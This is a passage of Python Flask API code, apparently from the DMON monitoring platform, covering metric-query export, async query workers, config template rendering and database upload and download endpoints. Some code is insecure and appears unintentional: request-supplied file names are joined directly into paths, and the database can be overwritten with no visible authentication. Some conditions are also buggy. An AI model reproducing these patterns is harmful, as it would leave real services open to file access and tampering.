app.logger.error('[%s] : [ERROR] Empty queryString received for query, returned error 404',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
if 'tstop' not in request.json['DMON']:
query = queryConstructor(tstart=request.json['DMON']['tstart'],
queryString=request.json['DMON']['queryString'],
size=request.json['DMON']['size'], ordering=request.json['DMON']['ordering'])
else:
query = queryConstructor(tstart=request.json['DMON']['tstart'], tstop=request.json['DMON']['tstop'],
queryString=request.json['DMON']['queryString'], size=request.json['DMON']['size'],
ordering=request.json['DMON']['ordering'])
if 'index' not in request.json['DMON']:
myIndex = 'logstash-*'
else:
myIndex = request.json['DMON']['index']
app.logger.info('[%s] : [INFO] Index set to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), myIndex)
if not 'metrics' in request.json['DMON'] or request.json['DMON']['metrics'] == " ":
try:
ListMetrics, resJson = queryESCore(query, debug=False, myIndex=myIndex)
except Exception as inst:
app.logger.error('[%s] : [ERROR] Cannot connect to ES instance with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'Connection error',
'Message': 'ES unreachable'})
response.status_code = 404
return response
if not ListMetrics:
response = jsonify({'Status': 'No results found',
'Message': 'Please check time interval and index'})
response.status_code = 404
app.logger.info('[%s] : [INFO] No results found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
if ftype == 'csv':
if not 'fname' in request.json['DMON']:
fileName = 'output' + '.csv'
dict2CSV(ListMetrics)
else:
fileName = request.json['DMON']['fname'] + '.csv'
dict2CSV(ListMetrics, request.json['DMON']['fname'])
csvOut = os.path.join(outDir, fileName)
try:
csvfile = open(csvOut, 'r')
except EnvironmentError:
response = jsonify({'EnvError': 'file not found'})
response.status_code = 500
app.logger.error('[%s] : [ERROR] CSV file not found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
return send_file(csvfile, mimetype='text/csv', as_attachment=True)
if ftype == 'json':
response = jsonify({'DMON': resJson})
response.status_code = 200
return response
if ftype == 'plain':
return Response(str(ListMetrics), status=200, mimetype='text/plain')
if ftype == 'oslc':
# queryStr = request.json['DMON']['queryString']
resOSLC = jsonToPerfMon(resJson)
return Response(resOSLC, mimetype='application/rdf+xml')
else:
metrics = request.json['DMON']['metrics']
app.logger.info('[%s] : [INFO] Metrics filter set to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(metrics))
try:
ListMetrics, resJson = queryESCore(query, allm=False, dMetrics=metrics, debug=False, myIndex=myIndex)
except Exception as inst:
app.logger.error('[%s] : [ERROR] Cannot connect to ES instance with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'Connection error',
'Message': 'ES unreachable'})
response.status_code = 404
return response
if not ListMetrics:
response = jsonify({'Status': 'No results found!'})
response.status_code = 404
app.logger.info('[%s] : [INFO] No results found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
# repeated from before create function
if ftype == 'csv':
if not 'fname' in request.json['DMON']:
fileName = 'output' + '.csv'
dict2CSV(ListMetrics)
else:
fileName = request.json['DMON']['fname'] + '.csv'
dict2CSV(ListMetrics, request.json['DMON']['fname'])
csvOut = os.path.join(outDir, fileName)
try:
csvfile = open(csvOut, 'r')
except EnvironmentError:
response = jsonify({'EnvError': 'file not found'})
response.status_code = 500
app.logger.error('[%s] : [ERROR] CSV file not found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
return send_file(csvfile, mimetype='text/csv', as_attachment=True)
if ftype == 'json':
response = jsonify({'DMON': resJson})
response.status_code = 200
return response
if ftype == 'plain':
return Response(str(ListMetrics), status=200, mimetype='text/plain')
if ftype == 'oslc':
# queryStr = request.json['DMON']['queryString']
resOSLC = jsonToPerfMon(resJson)
return Response(resOSLC, mimetype='application/rdf+xml')
@dmon.route('/v2/observer/query/<ftype>')
@api.doc(params={'ftype': 'Output type'})
class QueryEsEnhancedCore(Resource):
@api.expect(dDMONQueryEnh)
def post(self, ftype):
supportType = ["csv", "json"]
if ftype not in supportType:
response = jsonify({'Supported types': supportType, "Submitted Type": ftype})
response.status_code = 415
app.logger.warn('[%s] : [WARN] Unsuported output type %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), ftype)
return response
if request.json is None:
response = jsonify({'Status': 'Empty payload',
'Message': 'Request has empty payload'})
response.status_code = 417
app.logger.error('[%s] : [ERROR] Empty payload received for query, returned error 417',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
if 'aggregation' not in request.json['DMON']:
response = jsonify({'Status': 'Missing aggregation', 'Message': 'Aggregation must be defined'})
response.status_code = 400
app.logger.error('[%s] : [ERROR] Query missing aggregation field',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
supportedAggregation = ['system', 'yarn', 'spark', 'storm', 'cassandra']
if request.json['DMON']['aggregation'] not in supportedAggregation:
response = jsonify({'Supported aggregation': supportedAggregation, "Submitted Type": request.json['DMON']['aggregation']})
response.status_code = 415
app.logger.warn('[%s] : [WARN] Unsuported aggregation %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), request.json['DMON']['aggregation'])
return response
if 'index' not in request.json['DMON']:
index = 'logstash-*'
else:
index = request.json['DMON']['index']
app.logger.info('[%s] : [INFO] Using index %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), index)
if 'size' not in request.json['DMON']:
size = 0
else:
size = request.json['DMON']['size']
app.logger.info('[%s] : [INFO] Using size %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), size)
if 'tstop' and 'tstart' not in request.json['DMON']:
response = jsonify({'Status': 'Missing time interval declaration', 'Message': 'Both tstart and tstop must be defined'})
response.status_code = 400
app.logger.error('[%s] : [ERROR] Time interval not defined properly in request -> %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(request.json))
return response
if 'interval' not in request.json['DMON']:
interval = '10s'
else:
interval = request.json['DMON']['interval']
app.logger.info('[%s] : [INFO] Interval set to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), interval)
qES = dbESCore.query.filter_by(MasterNode=1).first()
if qES is None:
response = jsonify({'Status': 'Not found', 'Message': 'No es Core instance registered'})
response.status_code = 503
app.logger.info('[%s] : [INFO] ES core instance not registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
dqengine = QueryEngine(qES.hostIP)
qNode = dbNodes.query.all()
if qNode is None:
response = jsonify({'Status': 'No registered nodes'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No nodes found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
nodeList = []
for nodes in qNode:
nodeList.append(nodes.nodeFQDN)
if request.json['DMON']['aggregation'] == 'system':
# nodes, tfrom, to, qsize, qinterval, index)
df_system = dqengine.getSystemMetrics(nodeList, request.json['DMON']['tstart'], request.json['DMON']['tstop'], int(size), interval, index)
# df_system = dqengine.getSystemMetrics(nodeList, request.json['DMON']['tstart'],
# request.json['DMON']['tstop'], 0, '10s', 'logstash-*')
df_system.set_index('key', inplace=True)
if isinstance(df_system, int):
response = jsonify({'Status': 'error', 'Message': 'response is null'})
response.status_code = 500
app.logger.error('[%s] : [ERROR] System metrics return 0',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
if ftype == 'json':
response = jsonify(dqengine.toDict(df_system))
response.status_code = 200
return response
if ftype == 'csv':
if not 'fname' in request.json['DMON']:
fileName = 'output.csv'
else:
fileName = '%s.csv' % request.json['DMON']['fname']
csvOut = os.path.join(outDir, fileName)
dqengine.toCSV(df_system, csvOut)
# with open(csvOut, 'r') as f:
# read_data = f.read()
try:
csvfile = open(csvOut, 'r')
except EnvironmentError:
response = jsonify({'EnvError': 'file not found'})
response.status_code = 500
app.logger.error('[%s] : [ERROR] CSV file not found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
return send_file(csvfile, mimetype='text/csv', as_attachment=True)
if request.json['DMON']['aggregation'] == 'yarn':
df_dfs = dqengine.getDFS(request.json['DMON']['tstart'], request.json['DMON']['tstop'], int(size),
interval, index)
df_cluster = dqengine.getCluster(request.json['DMON']['tstart'], request.json['DMON']['tstop'],
int(size), interval, index)
df_name_node = dqengine.getNameNode(request.json['DMON']['tstart'], request.json['DMON']['tstop'],
int(size), interval, index)
nm_merged, jvmnn_merged, shuffle_merged = dqengine.getNodeManager(nodeList, request.json['DMON']['tstart'],
request.json['DMON']['tstop'], int(size),
interval, index)
df_dn_merged = dqengine.getDataNode(nodeList, request.json['DMON']['tstart'], request.json['DMON']['tstop'],
int(size), interval, index)
listDF = [df_dfs, df_cluster, df_name_node, nm_merged, jvmnn_merged, shuffle_merged, df_dn_merged]
df_merged = dqengine.merge(listDF)
df_merged.set_index('key', inplace=True)
if ftype == 'json':
response = jsonify(dqengine.toDict(df_merged))
response.status_code = 200
return response
if ftype == 'csv':
if not 'fname' in request.json['DMON']:
fileName = 'output.csv'
else:
fileName = '%s.csv' % request.json['DMON']['fname']
csvOut = os.path.join(outDir, fileName)
dqengine.toCSV(df_merged, csvOut)
# with open(csvOut, 'r') as f:
# read_data = f.read()
try:
csvfile = open(csvOut, 'r')
except EnvironmentError:
response = jsonify({'EnvError': 'file not found'})
response.status_code = 500
app.logger.error('[%s] : [ERROR] CSV file not found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
return send_file(csvfile, mimetype='text/csv', as_attachment=True)
if request.json['DMON']['aggregation'] == 'storm':
qSCore = dbSCore.query.first()
if qSCore is None:
response = jsonify({"Status": "No LS instances registered", "spouts": 0, "bolts": 0})
response.status_code = 500
app.logger.warning('[%s] : [WARN] No LS instance registred',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
if qSCore.LSCoreStormTopology == 'None':
response = jsonify({"Status": "No Storm topology registered"})
response.status_code = 404
app.logger.info(
'[%s] : [INFO] No Storm topology registered, cannot fetch number of spouts and bolts',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
else:
bolts, spouts = checkStormSpoutsBolts(qSCore.LSCoreStormEndpoint, qSCore.LSCoreStormPort,
qSCore.LSCoreStormTopology)
app.logger.info('[%s] : [INFO] Storm topology %s with %s spounts and %s bolts found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(qSCore.LSCoreStormTopology), str(spouts), str(bolts))
df_storm = dqengine.getStormMetrics(request.json['DMON']['tstart'], request.json['DMON']['tstop'],
int(size), interval, index, bolts=bolts, spouts=spouts)
if ftype == 'json':
response = jsonify(dqengine.toDict(df_storm))
response.status_code = 200
return response
if ftype == 'csv':
if not 'fname' in request.json['DMON']:
fileName = 'output.csv'
else:
fileName = '%s.csv' % request.json['DMON']['fname']
csvOut = os.path.join(outDir, fileName)
dqengine.toCSV(df_storm, csvOut)
try:
csvfile = open(csvOut, 'r')
except EnvironmentError:
response = jsonify({'EnvError': 'file not found'})
response.status_code = 500
app.logger.error('[%s] : [ERROR] CSV file not found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
return send_file(csvfile, mimetype='text/csv', as_attachment=True)
if request.json['DMON']['aggregation'] == 'spark':
return "Not for this version"
if request.json['DMON']['aggregation'] == 'cassandra':
df_CA_Count, df_CA_Gauge = dqengine.getCassandraMetrics(nodeList, request.json['DMON']['tstart'],
request.json['DMON']['tstop'], int(size), interval, index)
if isinstance(df_CA_Gauge, int) or isinstance(df_CA_Gauge, int):
response = jsonify({'Status': 'Empty response for cassandra metrics'})
response.status_code = 400
app.logger.warning('[%s] : [WARN] Empty response detected for Cassandra',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
listDF = [df_CA_Count, df_CA_Gauge]
df_merged = dqengine.merge(listDF)
df_merged.set_index('key', inplace=True)
if ftype == 'json':
response = jsonify(dqengine.toDict(df_merged))
response.status_code = 200
return response
if ftype == 'csv':
if not 'fname' in request.json['DMON']:
fileName = 'output.csv'
else:
fileName = '%s.csv' % request.json['DMON']['fname']
csvOut = os.path.join(outDir, fileName)
dqengine.toCSV(df_merged, csvOut)
# with open(csvOut, 'r') as f:
# read_data = f.read()
try:
csvfile = open(csvOut, 'r')
except EnvironmentError:
response = jsonify({'EnvError': 'file not found'})
response.status_code = 500
app.logger.error('[%s] : [ERROR] CSV file not found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
return send_file(csvfile, mimetype='text/csv', as_attachment=True)
if request.json['DMON']['aggregation'] == 'mongodb':
df_MD_Count, df_MD_Gauge = dqengine.getMongoMetrics(nodeList, request.json['DMON']['tstart'],
request.json['DMON']['stop'], int(size), interval, index)
if isinstance(df_MD_Count, int) or isinstance(df_MD_Gauge, int):
response = jsonify({'Status': 'Empty response for MongoDB metrics'})
response.status_code = 400
app.logger.warning('[%s] : [WARN] Empty response detected for MongoDB',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
listDF = [df_MD_Count, df_MD_Gauge]
df_merged = dqengine.merge(listDF)
df_merged.set_index('key', inplace=True)
if ftype == 'json':
response = jsonify(dqengine.toDict(df_merged))
response.status_code = 200
return response
if ftype == 'csv':
if not 'fname' in request.json['DMON']:
fileName = 'output.csv'
else:
fileName = '%s.csv' % request.json['DMON']['fname']
csvOut = os.path.join(outDir, fileName)
dqengine.toCSV(df_merged, csvOut)
try:
csvfile = open(csvOut, 'r')
except EnvironmentError:
response = jsonify({'EnvError': 'file not found'})
response.status_code = 500
app.logger.error('[%s] : [ERROR] CSV file not found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
return send_file(csvfile, mimetype='text/csv', as_attachment=True)
@dmon.route('/v3/observer/query/<ftype>')
@api.doc(params={'ftype': 'Output type'})
class QueryEsAsyncEnhancedCore(Resource):
@api.expect(dMONQuery) # this is for payload
def post(self, ftype):
# args = pQueryES.parse_args()#parsing query arguments in URI
supportType = ["csv", "json", "plain", "oslc"]
if ftype not in supportType:
response = jsonify({'Supported types': supportType, "Submitted Type": ftype})
response.status_code = 415
app.logger.warn('[%s] : [WARN] Unsuported output type %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), ftype)
return response
if ftype == 'oslc' and 'collectd' not in request.json['DMON']['queryString']:
response = jsonify({'Status': 'Unsuported query',
'Message': 'Only system metrics supported for oslc'})
response.status_code = 409
return response
if request.json is None:
response = jsonify({'Status': 'Empty payload',
'Message': 'Request has empty payload'})
response.status_code = 417
app.logger.error('[%s] : [ERROR] Empty payload received for query, returned error 417',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
if 'queryString' not in request.json['DMON']:
response = jsonify({'Status': 'No queryString',
'Message': 'Query string not found in payload'})
response.status_code = 404
app.logger.error('[%s] : [ERROR] Empty queryString received for query, returned error 404',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
if 'tstop' not in request.json['DMON']:
query = queryConstructor(tstart=request.json['DMON']['tstart'],
queryString=request.json['DMON']['queryString'],
size=request.json['DMON']['size'], ordering=request.json['DMON']['ordering'])
else:
query = queryConstructor(tstart=request.json['DMON']['tstart'], tstop=request.json['DMON']['tstop'],
queryString=request.json['DMON']['queryString'], size=request.json['DMON']['size'],
ordering=request.json['DMON']['ordering'])
if 'index' not in request.json['DMON']:
myIndex = 'logstash-*'
else:
myIndex = request.json['DMON']['index']
app.logger.info('[%s] : [INFO] Index set to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), myIndex)
if 'fname' not in request.json['DMON']:
fname = "%s.%s" %(str(uuid.uuid4())[:8], ftype)
else:
fname = "%s.%s" %(request.json['DMON']['fname'], ftype)
if os.path.isfile(os.path.join(outDir, fname)):
app.logger.warning('[%s] : [WARN] Duplicate query id detected, query with the id %s already exists!',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), fname)
message = 'Query with id %s already exists' %fname
response = jsonify({'Status': 'Query conflict', 'Message': message})
response.status_code = 409
return response
for proc in gbgProcessList:
try:
if not proc['process'].is_alive():
gbgProcessList.remove(proc)
app.logger.info('[%s] : [INFO] Process %s with PID %s inactive, removed from process list!',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), proc['uuid'], proc['pid'])
except Exception as inst:
app.logger.warning('[%s] : [INFO] Checking process failed with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), str(inst.args))
AsyncQueryWorkers = os.getenv('DMON_WORKERS', 50)
if len(gbgProcessList) > AsyncQueryWorkers:
app.logger.warning('[%s] : [WARN] Maximum number (%s) of query workers exeeded!',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(AsyncQueryWorkers))
message = 'Maximum number of query workers %s' %str(AsyncQueryWorkers)
response = jsonify({'Status': 'To many query workers', 'Message': message})
response.status_code = 429
return response
backProc = multiprocessing.Process(target=asyncQuery, args=(request, query, myIndex, ftype, fname,))
backProc.daemon = True
backProc.start()
start_time = time.time()
fuuid = fname.split('.')[0]
tuuid = fname.split('.')[1]
procdist = {'process': backProc, 'uuid': fuuid, 'pid': backProc.pid, 'start': start_time, 'OutputType': tuuid}
if not checkPID(backProc.pid):
response = jsonify({'Status': 'Worker Fail', 'Message': 'Failed to start query worker'})
response.status_code = 500
return response
gbgProcessList.append(procdist)
response = jsonify({'QueryID': fuuid, 'WorkerID': backProc.pid, 'Start': start_time, 'OutputType': tuuid})
response.status_code = 201
return response
@dmon.route('/v3/observer/query/<ftype>/async/list')
class QueryEsAsyncEnhancedCoreList(Resource):
def get(self, ftype):
supportType = ["csv", "json", "plain", "oslc", "all"]
if ftype not in supportType:
response = jsonify({'Supported types': supportType, "Submitted Type": ftype})
response.status_code = 415
app.logger.warn('[%s] : [WARN] Unsuported output type %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), ftype)
return response
if ftype == 'all':
outputFile = '*.*'
else:
outputFile = '*.%s' %ftype
lFile = []
for name in glob.glob(os.path.join(outDir, outputFile)):
path, filename = os.path.split(name)
if "tar" in filename:
pass
else:
lFile.append(filename)
response = jsonify({'Output': lFile})
response.status_code = 200
app.logger.info('[%s] : [INFO] Available output files %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(lFile))
return response
@dmon.route('/v3/observer/query/<ftype>/async/<nfile>')
class QueryEsAsyncEnhancedCoreSpecific(Resource):
def get(self, ftype, nfile):
supportType = ["csv", "json", "plain", "oslc", "all"]
if ftype not in supportType:
response = jsonify({'Supported types': supportType, "Submitted Type": ftype})
response.status_code = 415
app.logger.warn('[%s] : [WARN] Unsuported output type %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), ftype)
return response
fileName = "%s.%s" %(nfile, ftype)
filepath = os.path.join(outDir, fileName)
app.logger.info('[%s] : [INFO] File name %s, file path %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nfile, filepath)
if not os.path.isfile(filepath):
app.logger.warn('[%s] : [WARN] No output %s found of type %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nfile, ftype)
response = jsonify({'Status': 'Env Warning', 'Message': 'No output found', 'OutputName': fileName})
response.status_code = 404
return response
fileName = "%s.%s" %(nfile, ftype)
filePath = os.path.join(outDir, fileName)
if not os.path.isfile(filePath):
app.logger.warning('[%s] : [WARN] Query %s not found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), fileName)
response = jsonify({'Status': 'Not Available', 'QueryOut': fileName})
response.status_code = 404
return response
if ftype == 'csv':
app.logger.info('[%s] : [INFO] Exported query %s to csv',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nfile)
return send_file(filepath, mimetype='text/csv', as_attachment=True)
if ftype == 'json':
with open(filePath) as data_file:
data = json.load(data_file)
app.logger.info('[%s] : [INFO] Exported query %s to JSON',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nfile)
response = jsonify({'DMON': data})
response.status_code = 200
return response
if ftype == 'plain':
with open(filePath, 'r') as data_file:
data = data_file.read()
app.logger.info('[%s] : [INFO] Exported query %s to Plain type %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nfile)
return Response(data, status=200, mimetype='text/plain')
if ftype == 'oslc':
with open(filePath, 'r') as data_file:
data = data_file.read()
app.logger.info('[%s] : [INFO] Exported query %s to OSLC',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nfile)
return Response(data, mimetype='application/rdf+xml')
@dmon.route('/v3/observer/query/active')
class QueryEsAsyncEnhancedCoreActive(Resource):
def get(self):
alive = []
for proc in gbgProcessList:
procDetail = {}
if proc['process'].is_alive():
procDetail['QueryID'] = proc['uuid']
procDetail['OutputType'] = proc['OutputType']
procDetail['Start'] = proc['start']
procDetail['WorkerID'] = proc['pid']
alive.append(procDetail)
response = jsonify(alive)
response.status_code = 200
return response
@dmon.route('/v1/overlord')
class OverlordInfo(Resource):
def get(self):
response = jsonify({'Status': 'Current version is 0.2.4'})
response.status_code = 200
return response
@dmon.route('/v1/overlord/framework')
class OverlordFrameworkInfo(Resource):
def get(self):
response = jsonify({'Supported Frameworks': lFrameworks})
response.status_code = 200
return response
@dmon.route('/v1/overlord/framework/<fwork>')
@api.doc(params={'fwork': 'Big Data framework name'})
class OverlordFrameworkProperties(Resource):
def get(self, fwork):
if fwork not in lFrameworks:
response = jsonify({'Status': 'Malformed URI', 'Message': 'Unknown framework ' + fwork})
response.status_code = 404
app.logger.warning('[%s] : [WARN] Malformed URI because framewrok %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), fwork)
return response
if fwork == 'hdfs' or fwork == 'yarn':
templateLoader = jinja2.FileSystemLoader(searchpath="/")
templateEnv = jinja2.Environment(loader=templateLoader)
propYarnTmp = os.path.join(tmpDir, 'metrics/hadoop-metrics2.tmp')
propYarnFile = os.path.join(cfgDir, 'hadoop-metrics2.properties')
try:
template = templateEnv.get_template(propYarnTmp)
except:
response = jsonify({'Status': 'I/O Error', 'Message': 'Template file missing!'})
response.status_code = 500
app.logger.error('[%s] : [ERROR] YARN template file missing',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
qPeriod = dbMetPer.query.first()
if qPeriod is None:
period = '10'
else:
period = qPeriod.yarnMet
infoYarn = {'metrics2_period': period}
propSparkInfo = template.render(infoYarn)
propYarnConf = open(propYarnFile, "w+")
propYarnConf.write(propSparkInfo)
propYarnConf.close()
try:
propCfg = open(propYarnFile, 'r')
except EnvironmentError:
response = jsonify({'Status': 'Environment Error!', 'Message': 'File not Found!'})
response.status_code = 500
app.logger.error('[%s] : [ERROR] YARN/HDFS properties file not found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
return send_file(propCfg, mimetype='text/x-java-properties', as_attachment=True)
if fwork == 'spark':
templateLoader = jinja2.FileSystemLoader(searchpath="/")
templateEnv = jinja2.Environment(loader=templateLoader)
propSparkTemp = os.path.join(tmpDir, 'metrics/spark-metrics.tmp')
propSparkFile = os.path.join(cfgDir, 'metrics.properties')
try:
template = templateEnv.get_template(propSparkTemp)
except:
response = jsonify({'Status': 'I/O Error', 'Message': 'Template file missing!'})
response.status_code = 500
app.logger.error('[%s] : [ERROR] Spark template file missing',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
qLSCore = dbSCore.query.first() # TODO: Only works for single deployment
if qLSCore is None:
response = jsonify({'Status': 'Missing Instance', 'Message': 'No Logstash Instance Configured'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No Logstash server instance configured',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
qPeriod = dbMetPer.query.first()
if qPeriod is None:
period = '10'
else:
period = qPeriod.sparkMet
infoSpark = {'logstashserverip': qLSCore.hostIP, 'logstashportgraphite': '5002', 'period': period}
propSparkInfo = template.render(infoSpark)
propSparkConf = open(propSparkFile, "w+")
propSparkConf.write(propSparkInfo)
propSparkConf.close()
rSparkProp = open(propSparkFile, 'r')
return send_file(rSparkProp, mimetype='text/x-java-properties',
as_attachment=True) # TODO: Swagger returns same content each time, however sent file is correct
if fwork == 'cassandra':
return "Cassandra conf" #todo
if fwork == 'mongodb':
return "mongodb conf"
@dmon.route('/v1/overlord/application/<appID>')
@api.doc(params={'appID': 'Application identification'})
class OverlordAppSubmit(Resource):
def put(self, appID):
startT = datetime.utcnow()
qApp = dbApp.query.filter_by(appName=appID).first()
if qApp is None:
# Sort by id desc
lastApp = db.session.query(dbApp.id, dbApp.appName).order_by(dbApp.id.desc()).first()
if lastApp is None:
app.logger.info('[%s] : [INFO] No previouse application registered', datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
else:
# Get id of last inserted app, ordering is based in where lastApp is decalred; [0]-> dbApp.id
app.logger.info('[%s] : [INFO] Last registered applications id %s name %s, setting to inactive',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), lastApp[0],
lastApp[1])
qlastApp = dbApp.query.filter_by(appName=lastApp[1]).first()
qlastApp.stopTime = startT
qlastApp.jobID = 'STOPPED'
db.session.add(qlastApp)
appl = dbApp(appName=appID, appVersion=1, jobID='ACTIVE', startTime=startT, stopTime=None)
db.session.add(appl)
app.logger.info('[%s] : [INFO] Added new application %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), appID)
response = jsonify({'Status': 'Registered Application', 'App': appID, 'Start': startT})
response.status_code = 201
else:
newVer = int(qApp.appVersion) + 1
qApp.appVersion = newVer
qApp.startTime = startT
#check if it is marked as active if not set active and mark others as inactive
app.logger.info('[%s] : [INFO] Application %s has status %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), qApp.appName, qApp.jobID)
if qApp.jobID == 'ACTIVE':
pass
else:
qApp.jobID = 'ACTIVE'
qActive = dbApp.query.filter_by(jobID='ACTIVE').first()
app.logger.info('[%s] : [INFO] Found other active application %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), qActive.appName)
qActive.jobID = 'STOPPED'
db.session.add(qApp)
response = jsonify({'Status': 'Modified', 'App': appID, 'Version': qApp.appVersion})
app.logger.info('[%s] : [INFO] Modified application %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), appID)
response.status_code = 200
return response
@dmon.route('/v1/overlord/core')
class OverlordBootstrap(Resource):
def post(self):
return "Deploys all monitoring core components with default configuration"
@dmon.route('/v1/overlord/core/halt')
class OverlordCoreHalt(Resource):
def post(self):
return "Stop all core components!"
@dmon.route('/v1/overlord/core/database')
class OverlordCoredb(Resource):
def get(self):
try:
dbFile = open(os.path.join(baseDir, 'dmon.db'), 'r')
except EnvironmentError:
response = jsonify({'EnvError': 'file not found'})
response.status_code = 500
app.logger.error('[%s] [ERROR] Database not found')
return response
return send_file(dbFile, mimetype='application/x-sqlite3', as_attachment=True)
def put(self):
dbLoc = os.path.join(baseDir, 'dmon.db')
file = request.files['dmon.db']
if os.path.isfile(os.path.join(baseDir, 'dmon.db')) is True:
os.rename(dbLoc, dbLoc + '.backup')
app.logger.info('[%s] : [INFO] Old database backup created',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
file.save(dbLoc)
response = jsonify({'Status': 'Done',
'Message': 'New DB loaded'})
response.status_code = 201
app.logger.info('[%s] : [INFO] New database loaded',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
# @dmon.route('/v1/overlord/core/state')
# class OverlordCoreState(Resource):
# def get(self):
# qAll = db.session.query(dbNodes.nodeFQDN, dbSCore.hostFQDN, dbESCore.hostFQDN, dbKBCore.hostFQDN, dbApp.appName, dbCDHMng.cdhMng).all()
# payload ={}
# for res in qAll:
# qNodes = dbNodes.query.filter_by(nodeFQDN=res[0]).first()
@dmon.route('/v1/overlord/core/status')
class OverlordCoreStatus(Resource):
def get(self):
rspD = {}
qESCore = dbESCore.query.filter_by(
MasterNode=1).first() # TODO -> curerntly only generates config file for master node
if qESCore is None:
response = jsonify({"Status": "No master ES instances found!"})
response.status_code = 500
app.logger.warning('[%s] : [WARN] No Master ES Instance registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
try:
esCoreUrl = 'http://' + qESCore.hostIP + ':' + str(qESCore.nodePort)
r = requests.get(esCoreUrl, timeout=DMON_TIMEOUT) # timeout in seconds
except:
response = jsonify({"Error": "Master ES instances not reachable!"})
response.status_code = 500
app.logger.error('[%s] : [ERROR] ES instance not responding at %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), esCoreUrl)
return response
qLSCore = dbSCore.query.first() # TODO: -> only works for single LS deployment
if qLSCore is None:
